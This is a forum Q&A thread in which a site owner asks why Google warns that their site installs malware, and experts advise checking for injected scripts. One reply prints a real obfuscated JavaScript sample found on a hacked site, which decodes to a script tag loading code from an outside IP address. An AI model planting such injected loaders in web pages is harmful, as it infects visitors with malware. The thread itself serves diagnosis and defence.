?
Solved

Google Warning- visiting this web site may harm your computer!

Posted on 2009-07-06
5
Medium Priority
?
717 Views
Last Modified: 2013-12-09
When I click on my website through Search result from Google, I get Warning

It says - visiting this web site may harm your computer!

Also it says following:-
What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent.

Please let me know how to identify this issue and resolve it.
0
Comment
Question by:tps2009
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 3
  • 2
5 Comments
 
LVL 11

Expert Comment

by:techzter
ID: 24784384
Check through the code on your pages and look for something calling an external site, or a java script which is not yours.

I can't recall what they were calling this type of attack but it was growing like wildfire over the past few months. The attacks is sneaky and subtle. They don't alter the appearance of your pages at all. They just insert some code into your page and whoever hits the page unwittingly is opening themselves up for a trojan install to be put to use at a later date. If I can find some of the articles I will post them back here. In the meantime start browsing that code.

This is a sample of the code that I had found hidden in a particular site that was hacked.
### javascript hack ###

<script language=javascript><!--

document.write(unescape('hi%3C8bJsxqicridjpt%20src%3D8bJ%2Fxqi%2Fxqi9CCO4VV5%2E247%2ESB2%2E1sE9ksk5%2FjPIUqu8bJehirSBy%2EVV5jsksk%3Exqi%3Chi%2Fscdjript%3E').replace(/8bJ|dj|ksk|SB|VV5|PIU|hi|CCO|xqi|sE/g,""));

 --></script>
0
 
LVL 11

Expert Comment

by:techzter
ID: 24784399
Beyond just the page code do you also have some java scripts that run? Make sure to check the coding within those scripts as well to make sure that they are not executing some external code.
0
 
LVL 1

Accepted Solution

by:
Mokona earned 1500 total points
ID: 24792948
Thats called XSS - Cross Site Scripting

http://en.wikipedia.org/wiki/Cross-site_scripting
0
 
LVL 1

Expert Comment

by:Mokona
ID: 24792962
To prevent that from happening you should parse all inputs and strip the <script> tag or convert all applicable characters to HTML entities.

0
 
LVL 11

Expert Comment

by:techzter
ID: 24815704
@tps2009

How are things coming along? Have you been able to find some code that was causing your site to be flagged?
0

Featured Post

Get 15 Days FREE Full-Featured Trial

Benefit from a mission critical IT monitoring with Monitis Premium or get it FREE for your entry level monitoring needs.
-Over 200,000 users
-More than 300,000 websites monitored
-Used in 197 countries
-Recommended by 98% of users

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Developer portfolios can be a bit of an enigma—how do you present yourself to employers without burying them in lines of code?  A modern portfolio is more than just work samples, it’s also a statement of how you work.
When crafting your “Why Us” page, there are a plethora of pitfalls to avoid. Follow these five tips, and you’ll be well on your way to creating an effective page.
Explain concepts important to validation of email addresses with regular expressions. Applies to most languages/tools that uses regular expressions. Consider email address RFCs: Look at HTML5 form input element (with type=email) regex pattern: T…
Video by: Mark
This lesson goes over how to construct ordered and unordered lists and how to create hyperlinks.
Suggested Courses

800 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question